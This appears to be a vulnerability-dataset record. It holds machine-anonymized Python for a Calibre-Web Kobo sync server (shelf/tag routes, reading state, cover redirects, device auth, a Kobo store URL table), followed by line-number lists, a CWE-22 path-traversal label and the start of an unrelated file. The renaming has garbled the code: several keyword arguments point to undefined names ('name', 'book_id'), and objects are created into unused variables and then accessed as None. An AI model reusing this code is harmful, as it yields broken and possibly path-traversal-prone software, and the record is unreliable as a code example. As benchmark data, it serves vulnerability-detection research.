VAR_45["Series"] = {
"Name": FUNC_14(VAR_12),
"Number": FUNC_15(VAR_12), # ToDo Check int() ?
"NumberFloat": float(FUNC_15(VAR_12)),
"Id": uuid.uuid3(uuid.NAMESPACE_DNS, VAR_48),
}
return VAR_45
@csrf.exempt
@VAR_4.route("/v1/library/tags", methods=["POST", "DELETE"])
@requires_kobo_auth
def FUNC_17():
if request.method == "DELETE":
abort(405)
VAR_48, VAR_16 = None, None
try:
VAR_73 = request.json
VAR_48 = VAR_73["Name"]
VAR_16 = VAR_73["Items"]
if not VAR_48:
raise TypeError
except (KeyError, TypeError):
VAR_5.debug("Received malformed v1/library/tags request.")
abort(400, description="Malformed tags POST request. Data has empty 'Name', missing 'Name' or 'Items' field")
VAR_17 = ub.session.query(ub.Shelf).filter(ub.Shelf.name == VAR_48, ub.Shelf.user_id ==
current_user.id).one_or_none()
if VAR_17 and not shelf_lib.check_shelf_edit_permissions(VAR_17):
abort(401, description="User is unauthaurized to create VAR_17.")
if not VAR_17:
VAR_17 = ub.Shelf(user_id=current_user.id, VAR_48=name, uuid=str(uuid.uuid4()))
ub.session.add(VAR_17)
VAR_49 = FUNC_19(VAR_16, VAR_17)
if VAR_49:
VAR_5.debug("Received request to add unknown VAR_65 to a collection. Silently ignoring VAR_16.")
ub.session_commit()
return make_response(jsonify(str(VAR_17.uuid)), 201)
@VAR_4.route("/v1/library/tags/<VAR_15>", methods=["DELETE", "PUT"])
@requires_kobo_auth
def FUNC_18(VAR_15):
VAR_17 = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == VAR_15,
ub.Shelf.user_id == current_user.id).one_or_none()
if not VAR_17:
VAR_5.debug("Received Kobo VAR_53 update request on a collection unknown to CalibreWeb")
if config.config_kobo_proxy:
return FUNC_3()
else:
abort(404, description="Collection isn't known to CalibreWeb")
if not shelf_lib.check_shelf_edit_permissions(VAR_17):
abort(401, description="User is unauthaurized to edit VAR_17.")
if request.method == "DELETE":
shelf_lib.delete_shelf_helper(VAR_17)
else:
VAR_48 = None
try:
VAR_73 = request.json
VAR_48 = VAR_73["Name"]
except (KeyError, TypeError):
VAR_5.debug("Received malformed v1/library/tags rename request.")
abort(400, description="Malformed tags POST request. Data is missing 'Name' field")
VAR_17.name = VAR_48
ub.session.merge(VAR_17)
ub.session_commit()
return make_response(' ', 200)
def FUNC_19(VAR_16, VAR_17):
VAR_50 = set([book_shelf.book_id for book_shelf in VAR_17.books])
VAR_49 = []
for item in VAR_16:
try:
if item["Type"] != "ProductRevisionTagItem":
VAR_49.append(item)
continue
VAR_12 = calibre_db.get_book_by_uuid(item["RevisionId"])
if not VAR_12:
VAR_49.append(item)
continue
VAR_21 = VAR_12.id
if VAR_21 not in VAR_50:
VAR_17.books.append(ub.BookShelf(VAR_21=book_id))
except KeyError:
VAR_49.append(item)
return VAR_49
@csrf.exempt
@VAR_4.route("/v1/library/tags/<VAR_15>/items", methods=["POST"])
@requires_kobo_auth
def FUNC_20(VAR_15):
VAR_16 = None
try:
VAR_74 = request.json
VAR_16 = VAR_74["Items"]
except (KeyError, TypeError):
VAR_5.debug("Received malformed v1/library/tags/<VAR_15>/VAR_16/delete request.")
abort(400, description="Malformed tags POST request. Data is missing 'Items' field")
VAR_17 = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == VAR_15,
ub.Shelf.user_id == current_user.id).one_or_none()
if not VAR_17:
VAR_5.debug("Received Kobo request on a collection unknown to CalibreWeb")
abort(404, description="Collection isn't known to CalibreWeb")
if not shelf_lib.check_shelf_edit_permissions(VAR_17):
abort(401, description="User is unauthaurized to edit VAR_17.")
VAR_49 = FUNC_19(VAR_16, VAR_17)
if VAR_49:
VAR_5.debug("Received request to add an unknown VAR_12 to a collection. Silently ignoring item.")
ub.session.merge(VAR_17)
ub.session_commit()
return make_response('', 201)
@csrf.exempt
@VAR_4.route("/v1/library/tags/<VAR_15>/VAR_16/delete", methods=["POST"])
@requires_kobo_auth
def FUNC_21(VAR_15):
VAR_16 = None
try:
VAR_74 = request.json
VAR_16 = VAR_74["Items"]
except (KeyError, TypeError):
VAR_5.debug("Received malformed v1/library/tags/<VAR_15>/VAR_16/delete request.")
abort(400, description="Malformed tags POST request. Data is missing 'Items' field")
VAR_17 = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == VAR_15,
ub.Shelf.user_id == current_user.id).one_or_none()
if not VAR_17:
VAR_5.debug(
"Received a request to remove an item from a Collection unknown to CalibreWeb.")
abort(404, description="Collection isn't known to CalibreWeb")
if not shelf_lib.check_shelf_edit_permissions(VAR_17):
abort(401, description="User is unauthaurized to edit VAR_17.")
VAR_49 = []
for item in VAR_16:
try:
if item["Type"] != "ProductRevisionTagItem":
VAR_49.append(item)
continue
VAR_12 = calibre_db.get_book_by_uuid(item["RevisionId"])
if not VAR_12:
VAR_49.append(item)
continue
VAR_17.books.filter(ub.BookShelf.book_id == VAR_12.id).delete()
except KeyError:
VAR_49.append(item)
ub.session_commit()
if VAR_49:
VAR_5.debug("Received request to remove an unknown VAR_12 to a collecition. Silently ignoring item.")
return make_response('', 200)
def FUNC_22(VAR_7, VAR_9, VAR_18=False):
VAR_51 = VAR_7.tags_last_modified
for VAR_17 in ub.session.query(ub.ShelfArchive).filter(
func.datetime(ub.ShelfArchive.last_modified) > VAR_7.tags_last_modified,
ub.ShelfArchive.user_id == current_user.id
):
VAR_51 = max(VAR_17.last_modified, VAR_51)
VAR_9.append({
"DeletedTag": {
"Tag": {
"Id": VAR_17.uuid,
"LastModified": FUNC_4(VAR_17.last_modified)
}
}
})
VAR_52 = []
if VAR_18:
for VAR_17 in ub.session.query(ub.Shelf).filter(
func.datetime(ub.Shelf.last_modified) > VAR_7.tags_last_modified,
ub.Shelf.user_id == current_user.id,
not ub.Shelf.kobo_sync
):
VAR_9.append({
"DeletedTag": {
"Tag": {
"Id": VAR_17.uuid,
"LastModified": FUNC_4(VAR_17.last_modified)
}
}
})
VAR_52.append(ub.Shelf.kobo_sync)
if sqlalchemy_version2:
VAR_75 = ub.session.execute(select(ub.Shelf).outerjoin(ub.BookShelf).filter(
or_(func.datetime(ub.Shelf.last_modified) > VAR_7.tags_last_modified,
func.datetime(ub.BookShelf.date_added) > VAR_7.tags_last_modified),
ub.Shelf.user_id == current_user.id,
*VAR_52
).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())).columns(ub.Shelf)
else:
VAR_75 = ub.session.query(ub.Shelf).outerjoin(ub.BookShelf).filter(
or_(func.datetime(ub.Shelf.last_modified) > VAR_7.tags_last_modified,
func.datetime(ub.BookShelf.date_added) > VAR_7.tags_last_modified),
ub.Shelf.user_id == current_user.id,
*VAR_52
).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())
for VAR_17 in VAR_75:
if not shelf_lib.check_shelf_view_permissions(VAR_17):
continue
VAR_51 = max(VAR_17.last_modified, VAR_51)
VAR_53 = FUNC_23(VAR_17)
if not VAR_53:
continue
if VAR_17.created > VAR_7.tags_last_modified:
VAR_9.append({
"NewTag": VAR_53
})
else:
VAR_9.append({
"ChangedTag": VAR_53
})
VAR_7.tags_last_modified = VAR_51
ub.session_commit()
def FUNC_23(VAR_17):
VAR_53 = {
"Created": FUNC_4(VAR_17.created),
"Id": VAR_17.uuid,
"Items": [],
"LastModified": FUNC_4(VAR_17.last_modified),
"Name": VAR_17.name,
"Type": "UserTag"
}
for book_shelf in VAR_17.books:
VAR_12 = calibre_db.get_book(book_shelf.book_id)
if not VAR_12:
VAR_5.info(u"Book (id: %s) in BookShelf (id: %s) not found in VAR_12 database", book_shelf.book_id, VAR_17.id)
continue
VAR_53["Items"].append(
{
"RevisionId": VAR_12.uuid,
"Type": "ProductRevisionTagItem"
}
)
return {"Tag": VAR_53}
@VAR_4.route("/v1/library/<VAR_11>/state", methods=["GET", "PUT"])
@requires_kobo_auth
def FUNC_24(VAR_11):
VAR_12 = calibre_db.get_book_by_uuid(VAR_11)
if not VAR_12 or not VAR_12.data:
VAR_5.info(u"Book %s not found in database", VAR_11)
return FUNC_3()
VAR_22 = FUNC_28(VAR_12.id)
if request.method == "GET":
return jsonify([FUNC_29(VAR_12, VAR_22)])
else:
VAR_76 = {"EntitlementId": VAR_11}
try:
VAR_81 = request.json
VAR_82 = VAR_81["ReadingStates"][0]
VAR_83 = VAR_82["CurrentBookmark"]
if VAR_83:
VAR_25 = VAR_22.current_bookmark
VAR_25.progress_percent = VAR_83["ProgressPercent"]
VAR_25.content_source_progress_percent = VAR_83["ContentSourceProgressPercent"]
VAR_87 = VAR_83["Location"]
if VAR_87:
VAR_25.location_value = VAR_87["Value"]
VAR_25.location_type = VAR_87["Type"]
VAR_25.location_source = VAR_87["Source"]
VAR_76["CurrentBookmarkResult"] = {"Result": "Success"}
VAR_84 = VAR_82["Statistics"]
if VAR_84:
VAR_24 = VAR_22.statistics
VAR_24.spent_reading_minutes = int(VAR_84["SpentReadingMinutes"])
VAR_24.remaining_time_minutes = int(VAR_84["RemainingTimeMinutes"])
VAR_76["StatisticsResult"] = {"Result": "Success"}
VAR_85 = VAR_82["StatusInfo"]
if VAR_85:
VAR_23 = VAR_22.book_read_link
VAR_88 = FUNC_26(VAR_85["Status"])
if VAR_88 == ub.ReadBook.STATUS_IN_PROGRESS \
and VAR_88 != VAR_23.read_status:
VAR_23.times_started_reading += 1
VAR_23.last_time_started_reading = datetime.datetime.utcnow()
VAR_23.read_status = VAR_88
VAR_76["StatusInfoResult"] = {"Result": "Success"}
except (KeyError, TypeError, ValueError, StatementError):
VAR_5.debug("Received malformed v1/library/<VAR_11>/state request.")
ub.session.rollback()
abort(400, description="Malformed request data is missing 'ReadingStates' key")
ub.session.merge(VAR_22)
ub.session_commit()
return jsonify({
"RequestResult": "Success",
"UpdateResults": [VAR_76],
})
def FUNC_25(VAR_19):
VAR_54 = {
None: "ReadyToRead",
ub.ReadBook.STATUS_UNREAD: "ReadyToRead",
ub.ReadBook.STATUS_FINISHED: "Finished",
ub.ReadBook.STATUS_IN_PROGRESS: "Reading",
}
return VAR_54[VAR_19.read_status]
def FUNC_26(VAR_20):
VAR_55 = {
None: None,
"ReadyToRead": ub.ReadBook.STATUS_UNREAD,
"Finished": ub.ReadBook.STATUS_FINISHED,
"Reading": ub.ReadBook.STATUS_IN_PROGRESS,
}
return VAR_55[VAR_20]
def FUNC_27(VAR_21):
VAR_56 = ub.KoboSyncedBooks()
VAR_56.user_id = current_user.id
VAR_56.book_id = VAR_21
ub.session.add(VAR_56)
try:
ub.session.commit()
except Exception:
ub.session.rollback()
def FUNC_28(VAR_21):
VAR_23 = ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == VAR_21,
ub.ReadBook.user_id == current_user.id).one_or_none()
if not VAR_23:
book_read = ub.ReadBook(user_id=current_user.id, VAR_21=book_id)
if not VAR_23.kobo_reading_state:
VAR_22 = ub.KoboReadingState(user_id=VAR_23.user_id, VAR_21=book_id)
VAR_22.current_bookmark = ub.KoboBookmark()
VAR_22.statistics = ub.KoboStatistics()
VAR_23.kobo_reading_state = VAR_22
ub.session.add(VAR_23)
ub.session_commit()
return VAR_23.kobo_reading_state
def FUNC_29(VAR_12, VAR_22):
return {
"EntitlementId": VAR_12.uuid,
"Created": FUNC_4(VAR_12.timestamp),
"LastModified": FUNC_4(VAR_22.last_modified),
"PriorityTimestamp": FUNC_4(VAR_22.priority_timestamp),
"StatusInfo": FUNC_30(VAR_22.book_read_link),
"Statistics": FUNC_31(VAR_22.statistics),
"CurrentBookmark": FUNC_32(VAR_22.current_bookmark),
}
def FUNC_30(VAR_23):
VAR_57 = {
"LastModified": FUNC_4(VAR_23.last_modified),
"Status": FUNC_25(VAR_23),
"TimesStartedReading": VAR_23.times_started_reading,
}
if VAR_23.last_time_started_reading:
VAR_57["LastTimeStartedReading"] = FUNC_4(VAR_23.last_time_started_reading)
return VAR_57
def FUNC_31(VAR_24):
VAR_57 = {
"LastModified": FUNC_4(VAR_24.last_modified),
}
if VAR_24.spent_reading_minutes:
VAR_57["SpentReadingMinutes"] = VAR_24.spent_reading_minutes
if VAR_24.remaining_time_minutes:
VAR_57["RemainingTimeMinutes"] = VAR_24.remaining_time_minutes
return VAR_57
def FUNC_32(VAR_25):
VAR_57 = {
"LastModified": FUNC_4(VAR_25.last_modified),
}
if VAR_25.progress_percent:
VAR_57["ProgressPercent"] = VAR_25.progress_percent
if VAR_25.content_source_progress_percent:
VAR_57["ContentSourceProgressPercent"] = VAR_25.content_source_progress_percent
if VAR_25.location_value:
VAR_57["Location"] = {
"Value": VAR_25.location_value,
"Type": VAR_25.location_type,
"Source": VAR_25.location_source,
}
return VAR_57
@VAR_4.route("/<VAR_11>/<VAR_26>/<VAR_27>/<VAR_29>/image.jpg", defaults={'Quality': ""})
@VAR_4.route("/<VAR_11>/<VAR_26>/<VAR_27>/<VAR_28>/<VAR_29>/image.jpg")
@requires_kobo_auth
def FUNC_33(VAR_11, VAR_26, VAR_27,VAR_28, VAR_29):
VAR_58 = helper.get_book_cover_with_uuid(
VAR_11, use_generic_cover_on_failure=False
)
if not VAR_58:
if config.config_kobo_proxy:
VAR_5.debug("Cover for unknown VAR_12: %s proxied to kobo" % VAR_11)
return redirect(VAR_2 +
"/{VAR_11}/{VAR_26}/{VAR_27}/false/image.jpg".format(VAR_11=book_uuid,
VAR_26=width,
VAR_27=height), 307)
else:
VAR_5.debug("Cover for unknown VAR_12: %s requested" % VAR_11)
return make_response(jsonify({}))
VAR_5.debug("Cover request received for VAR_12 %s" % VAR_11)
return VAR_58
@VAR_4.route("")
def FUNC_34():
return make_response(jsonify({}))
@VAR_4.route("/v1/library/<VAR_11>", methods=["DELETE"])
@requires_kobo_auth
def FUNC_35(VAR_11):
VAR_5.info("Kobo VAR_12 deletion request received for VAR_12 %s" % VAR_11)
VAR_12 = calibre_db.get_book_by_uuid(VAR_11)
if not VAR_12:
VAR_5.info(u"Book %s not found in database", VAR_11)
return FUNC_3()
VAR_21 = VAR_12.id
VAR_59 = (
ub.session.query(ub.ArchivedBook)
.filter(ub.ArchivedBook.book_id == VAR_21)
.first()
)
if not VAR_59:
archived_book = ub.ArchivedBook(user_id=current_user.id, VAR_21=book_id)
VAR_59.is_archived = True
VAR_59.last_modified = datetime.datetime.utcnow()
ub.session.merge(VAR_59)
ub.session_commit()
return ("", 204)
@VAR_4.route("/v1/library/<VAR_30>", methods=["DELETE", "GET"])
def FUNC_36(VAR_30=None):
VAR_5.debug("Unimplemented Library Request received: %s", request.base_url)
return FUNC_3()
@csrf.exempt
@VAR_4.route("/v1/user/loyalty/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/user/profile", methods=["GET", "POST"])
@VAR_4.route("/v1/user/wishlist", methods=["GET", "POST"])
@VAR_4.route("/v1/user/recommendations", methods=["GET", "POST"])
@VAR_4.route("/v1/analytics/<VAR_30>", methods=["GET", "POST"])
def FUNC_37(VAR_30=None):
VAR_5.debug("Unimplemented User Request received: %s", request.base_url)
return FUNC_3()
@csrf.exempt
@VAR_4.route("/v1/products/<VAR_30>/prices", methods=["GET", "POST"])
@VAR_4.route("/v1/products/<VAR_30>/recommendations", methods=["GET", "POST"])
@VAR_4.route("/v1/products/<VAR_30>/nextread", methods=["GET", "POST"])
@VAR_4.route("/v1/products/<VAR_30>/reviews", methods=["GET", "POST"])
@VAR_4.route("/v1/products/VAR_65/external/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/products/VAR_65/series/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/products/VAR_65/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/products/dailydeal", methods=["GET", "POST"])
@VAR_4.route("/v1/products", methods=["GET", "POST"])
def FUNC_38(VAR_30=None):
VAR_5.debug("Unimplemented Products Request received: %s", request.base_url)
return FUNC_3()
def FUNC_39():
VAR_60 = request.get_json()
VAR_61 = base64.b64encode(os.urandom(24)).decode('utf-8')
VAR_62 = base64.b64encode(os.urandom(24)).decode('utf-8')
return make_response(
jsonify(
{
"AccessToken": VAR_61,
"RefreshToken": VAR_62,
"TokenType": "Bearer",
"TrackingId": str(uuid.uuid4()),
"UserKey": VAR_60['UserKey'],
}
)
)
@csrf.exempt
@VAR_4.route("/v1/auth/device", methods=["POST"])
@requires_kobo_auth
def FUNC_40():
VAR_5.debug('Kobo Auth request')
if config.config_kobo_proxy:
try:
return FUNC_3()
except Exception:
VAR_5.error("Failed to receive or parse VAR_44 from Kobo's auth endpoint. Falling back to un-proxied mode.")
return FUNC_39()
@VAR_4.route("/v1/initialization")
@requires_kobo_auth
def FUNC_41():
VAR_5.info('Init')
VAR_63 = None
if config.config_kobo_proxy:
try:
VAR_35 = FUNC_2()
VAR_86 = VAR_35.json()
if "Resources" in VAR_86:
VAR_63 = VAR_86["Resources"]
except Exception:
VAR_5.error("Failed to receive or parse VAR_44 from Kobo's init endpoint. Falling back to un-proxied mode.")
if not VAR_63:
kobo_resources = FUNC_43()
if not current_app.wsgi_app.is_proxied:
VAR_5.debug('Kobo: Received unproxied request, changed request port to external server port')
if ':' in request.host and not request.host.endswith(']'):
VAR_80 = "".join(request.host.split(':')[:-1])
else:
VAR_80 = request.host
VAR_77 = "{url_scheme}://{url_base}:{url_port}".format(
url_scheme=request.scheme,
url_base=VAR_80,
url_port=config.config_external_port
)
VAR_5.debug('Kobo: Received unproxied request, changed request url to %s', VAR_77)
VAR_63["image_host"] = VAR_77
VAR_63["image_url_quality_template"] = unquote(VAR_77 +
url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
VAR_11="{ImageId}",
VAR_26="{VAR_26}",
VAR_27="{VAR_27}",
VAR_28='{VAR_28}',
VAR_29='isGreyscale'))
VAR_63["image_url_template"] = unquote(VAR_77 +
url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
VAR_11="{ImageId}",
VAR_26="{VAR_26}",
VAR_27="{VAR_27}",
VAR_29='false'))
else:
VAR_63["image_host"] = url_for("web.index", _external=True).strip("/")
VAR_63["image_url_quality_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
VAR_11="{ImageId}",
VAR_26="{VAR_26}",
VAR_27="{VAR_27}",
VAR_28='{VAR_28}',
VAR_29='isGreyscale',
_external=True))
VAR_63["image_url_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
VAR_11="{ImageId}",
VAR_26="{VAR_26}",
VAR_27="{VAR_27}",
VAR_29='false',
_external=True))
VAR_44 = make_response(jsonify({"Resources": VAR_63}))
VAR_44.headers["x-VAR_4-apitoken"] = "e30="
return VAR_44
@VAR_4.route("/download/<VAR_21>/<VAR_13>")
@requires_kobo_auth
@download_required
def FUNC_42(VAR_21, VAR_13):
return get_download_link(VAR_21, VAR_13, "kobo")
def FUNC_43():
return {
"account_page": "https://secure.kobobooks.com/profile",
"account_page_rakuten": "https://my.rakuten.co.jp/",
"add_entitlement": "https://storeapi.kobo.com/v1/library/{RevisionIds}",
"affiliaterequest": "https://storeapi.kobo.com/v1/affiliate",
"audiobook_subscription_orange_deal_inclusion_url": "https://authorize.kobo.com/inclusion",
"authorproduct_recommendations": "https://storeapi.kobo.com/v1/products/VAR_65/authors/recommendations",
"autocomplete": "https://storeapi.kobo.com/v1/products/autocomplete",
"blackstone_header": {"key": "x-amz-request-payer", "value": "requester"},
"book": "https://storeapi.kobo.com/v1/products/VAR_65/{ProductId}",
"book_detail_page": "https://store.kobobooks.com/{culture}/ebook/{slug}",
"book_detail_page_rakuten": "https://VAR_65.rakuten.co.jp/rk/{crossrevisionid}",
"book_landing_page": "https://store.kobobooks.com/ebooks",
"book_subscription": "https://storeapi.kobo.com/v1/products/VAR_65/subscriptions",
"categories": "https://storeapi.kobo.com/v1/categories",
"categories_page": "https://store.kobobooks.com/ebooks/categories",
"category": "https://storeapi.kobo.com/v1/categories/{CategoryId}",
"category_featured_lists": "https://storeapi.kobo.com/v1/categories/{CategoryId}/featured",
"category_products": "https://storeapi.kobo.com/v1/categories/{CategoryId}/products",
"checkout_borrowed_book": "https://storeapi.kobo.com/v1/library/borrow",
"configuration_data": "https://storeapi.kobo.com/v1/configuration",
"content_access_book": "https://storeapi.kobo.com/v1/products/VAR_65/{ProductId}/access",
"customer_care_live_chat": "https://v2.zopim.com/widget/livechat.html?key=Y6gwUmnu4OATxN3Tli4Av9bYN319BTdO",
"daily_deal": "https://storeapi.kobo.com/v1/products/dailydeal",
"deals": "https://storeapi.kobo.com/v1/deals",
"delete_entitlement": "https://storeapi.kobo.com/v1/library/{Ids}",
"delete_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
"delete_tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/VAR_16/delete",
"device_auth": "https://storeapi.kobo.com/v1/auth/device",
"device_refresh": "https://storeapi.kobo.com/v1/auth/refresh",
"dictionary_host": "https://kbdownload1-a.akamaihd.net",
"discovery_host": "https://discovery.kobobooks.com",
"eula_page": "https://www.kobo.com/termsofuse?style=onestore",
"exchange_auth": "https://storeapi.kobo.com/v1/auth/exchange",
"external_book": "https://storeapi.kobo.com/v1/products/VAR_65/external/{Ids}",
"facebook_sso_page": "https://authorize.kobo.com/signin/provider/Facebook/login?returnUrl=http://store.kobobooks.com/",
"featured_list": "https://storeapi.kobo.com/v1/products/featured/{FeaturedListId}",
"featured_lists": "https://storeapi.kobo.com/v1/products/featured",
"free_books_page": {
"EN": "https://www.kobo.com/{region}/{language}/p/free-ebooks",
"FR": "https://www.kobo.com/{region}/{language}/p/livres-gratuits",
"IT": "https://www.kobo.com/{region}/{language}/p/libri-gratuiti",
"NL": "https://www.kobo.com/{region}/{language}/List/bekijk-het-overzicht-van-gratis-ebooks/QpkkVWnUw8sxmgjSlCbJRg",
"PT": "https://www.kobo.com/{region}/{language}/p/livros-gratis",
},
"fte_feedback": "https://storeapi.kobo.com/v1/products/ftefeedback",
"get_tests_request": "https://storeapi.kobo.com/v1/analytics/gettests",
"giftcard_epd_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem-ereader",
"giftcard_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem",
"help_page": "https://www.kobo.com/help",
"kobo_audiobooks_enabled": "False",
"kobo_audiobooks_orange_deal_enabled": "False",
"kobo_audiobooks_subscriptions_enabled": "False",
"kobo_nativeborrow_enabled": "True",
"kobo_onestorelibrary_enabled": "False",
"kobo_redeem_enabled": "True",
"kobo_shelfie_enabled": "False",
"kobo_subscriptions_enabled": "False",
"kobo_superpoints_enabled": "False",
"kobo_wishlist_enabled": "True",
"library_book": "https://storeapi.kobo.com/v1/user/library/VAR_65/{LibraryItemId}",
"library_items": "https://storeapi.kobo.com/v1/user/library",
"library_metadata": "https://storeapi.kobo.com/v1/library/{Ids}/metadata",
"library_prices": "https://storeapi.kobo.com/v1/user/library/previews/prices",
"library_stack": "https://storeapi.kobo.com/v1/user/library/stacks/{LibraryItemId}",
"library_sync": "https://storeapi.kobo.com/v1/library/sync",
"love_dashboard_page": "https://store.kobobooks.com/{culture}/kobosuperpoints",
"love_points_redemption_page": "https://store.kobobooks.com/{culture}/KoboSuperPointsRedemption?productId={ProductId}",
"magazine_landing_page": "https://store.kobobooks.com/emagazines",
"notifications_registration_issue": "https://storeapi.kobo.com/v1/notifications/registration",
"oauth_host": "https://oauth.kobo.com",
"overdrive_account": "https://auth.overdrive.com/account",
"overdrive_library": "https://{libraryKey}.auth.overdrive.com/library",
"overdrive_library_finder_host": "https://libraryfinder.api.overdrive.com",
"overdrive_thunder_host": "https://thunder.api.overdrive.com",
"password_retrieval_page": "https://www.kobobooks.com/passwordretrieval.html",
"post_analytics_event": "https://storeapi.kobo.com/v1/analytics/event",
"privacy_page": "https://www.kobo.com/privacypolicy?style=onestore",
"product_nextread": "https://storeapi.kobo.com/v1/products/{ProductIds}/nextread",
"product_prices": "https://storeapi.kobo.com/v1/products/{ProductIds}/prices",
"product_recommendations": "https://storeapi.kobo.com/v1/products/{ProductId}/recommendations",
"product_reviews": "https://storeapi.kobo.com/v1/products/{ProductIds}/reviews",
"products": "https://storeapi.kobo.com/v1/products",
"provider_external_sign_in_page": "https://authorize.kobo.com/ExternalSignIn/{providerName}?returnUrl=http://store.kobobooks.com/",
"purchase_buy": "https://www.kobo.com/checkout/createpurchase/",
"purchase_buy_templated": "https://www.kobo.com/{culture}/checkout/createpurchase/{ProductId}",
"quickbuy_checkout": "https://storeapi.kobo.com/v1/store/quickbuy/{PurchaseId}/checkout",
"quickbuy_create": "https://storeapi.kobo.com/v1/store/quickbuy/purchase",
"rating": "https://storeapi.kobo.com/v1/products/{ProductId}/rating/{Rating}",
"reading_state": "https://storeapi.kobo.com/v1/library/{Ids}/state",
"redeem_interstitial_page": "https://store.kobobooks.com",
"registration_page": "https://authorize.kobo.com/signup?returnUrl=http://store.kobobooks.com/",
"related_items": "https://storeapi.kobo.com/v1/products/{Id}/related",
"remaining_book_series": "https://storeapi.kobo.com/v1/products/VAR_65/series/{SeriesId}",
"rename_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
"review": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}",
"review_sentiment": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}/sentiment/{Sentiment}",
"shelfie_recommendations": "https://storeapi.kobo.com/v1/user/recommendations/shelfie",
"sign_in_page": "https://authorize.kobo.com/signin?returnUrl=http://store.kobobooks.com/",
"social_authorization_host": "https://social.kobobooks.com:8443",
"social_host": "https://social.kobobooks.com",
"stacks_host_productId": "https://store.kobobooks.com/collections/byproductid/",
"store_home": "www.kobo.com/{region}/{language}",
"store_host": "store.kobobooks.com",
"store_newreleases": "https://store.kobobooks.com/{culture}/List/new-releases/961XUjtsU0qxkFItWOutGA",
"store_search": "https://store.kobobooks.com/{culture}/Search?Query={query}",
"store_top50": "https://store.kobobooks.com/{culture}/ebooks/Top",
"tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/Items",
"tags": "https://storeapi.kobo.com/v1/library/tags",
"taste_profile": "https://storeapi.kobo.com/v1/products/tasteprofile",
"update_accessibility_to_preview": "https://storeapi.kobo.com/v1/library/{EntitlementIds}/preview",
"use_one_store": "False",
"user_loyalty_benefits": "https://storeapi.kobo.com/v1/user/loyalty/benefits",
"user_platform": "https://storeapi.kobo.com/v1/user/platform",
"user_profile": "https://storeapi.kobo.com/v1/user/profile",
"user_ratings": "https://storeapi.kobo.com/v1/user/ratings",
"user_recommendations": "https://storeapi.kobo.com/v1/user/recommendations",
"user_reviews": "https://storeapi.kobo.com/v1/user/reviews",
"user_wishlist": "https://storeapi.kobo.com/v1/user/wishlist",
"userguide_host": "https://kbdownload1-a.akamaihd.net",
"wishlist_page": "https://store.kobobooks.com/{region}/{language}/account/wishlist",
}
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
26,
31,
49,
56,
60,
62,
66,
68,
69,
71,
77,
78,
85,
86,
89,
90,
96,
106,
107,
113,
115,
119,
125,
126,
133,
134,
144,
145,
146,
147,
153,
154,
155,
157,
159,
176,
177,
206,
207,
208,
209,
220,
226,
231,
233,
238,
243,
253,
255,
264,
266,
268,
269,
274,
276,
277,
279,
281,
295,
299,
309,
311,
316,
317,
319,
320,
324,
327,
334,
340,
341,
343,
345,
346,
358,
361,
362,
369,
385,
386,
403,
404,
407,
408,
413,
414,
415,
427,
428,
433,
434,
439,
442,
443,
447,
452,
458,
460,
463,
467,
483,
484,
492,
502,
505,
507,
508,
511,
513,
526,
531,
535,
541,
542,
554,
557,
568,
573,
574,
575,
584,
589,
596,
597,
608,
614,
617,
621,
625,
626,
637,
644,
647,
654,
659,
664,
667,
669,
670,
671,
672,
675,
689,
706,
721,
722,
726,
728,
732,
743,
744,
745,
767,
768,
776,
778,
783,
787,
799,
806,
821,
828,
829,
838,
839,
848,
858,
859,
873,
874,
880,
886,
887,
897,
898,
908,
909,
925,
942,
946,
947,
951,
952,
961,
972,
976,
977,
978,
983,
984,
985,
994,
995,
1008,
1009,
1011,
1012,
1027,
1028,
1039,
1040,
1045,
1057,
1103,
1106,
1108,
1109,
1115,
1116,
1240
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
26,
31,
49,
50,
57,
61,
63,
67,
69,
70,
72,
78,
79,
86,
87,
90,
91,
97,
107,
108,
114,
116,
120,
126,
127,
134,
135,
145,
146,
147,
148,
154,
155,
156,
158,
160,
177,
178,
207,
208,
209,
210,
221,
227,
232,
234,
239,
244,
254,
256,
265,
267,
269,
270,
275,
277,
278,
280,
282,
296,
300,
310,
312,
317,
318,
320,
321,
325,
328,
335,
341,
342,
344,
346,
347,
359,
362,
363,
370,
386,
387,
404,
405,
408,
409,
414,
415,
416,
428,
429,
434,
435,
440,
443,
444,
448,
453,
459,
461,
464,
468,
484,
485,
493,
503,
506,
508,
512,
514,
527,
532,
536,
542,
543,
555,
558,
569,
574,
575,
576,
585,
590,
597,
598,
610,
616,
619,
623,
627,
628,
640,
647,
650,
657,
662,
667,
670,
672,
673,
674,
675,
678,
692,
709,
724,
725,
729,
731,
735,
746,
747,
748,
770,
771,
779,
781,
786,
790,
802,
809,
824,
831,
832,
841,
842,
851,
861,
862,
876,
877,
883,
889,
890,
900,
901,
911,
912,
928,
945,
949,
950,
954,
955,
964,
975,
979,
980,
981,
986,
987,
988,
998,
999,
1013,
1014,
1016,
1017,
1032,
1033,
1045,
1046,
1051,
1063,
1109,
1112,
1114,
1115,
1121,
1122,
1246
] |
0CWE-22
| #
# The OpenDiamond Platform for Interactive Search
#
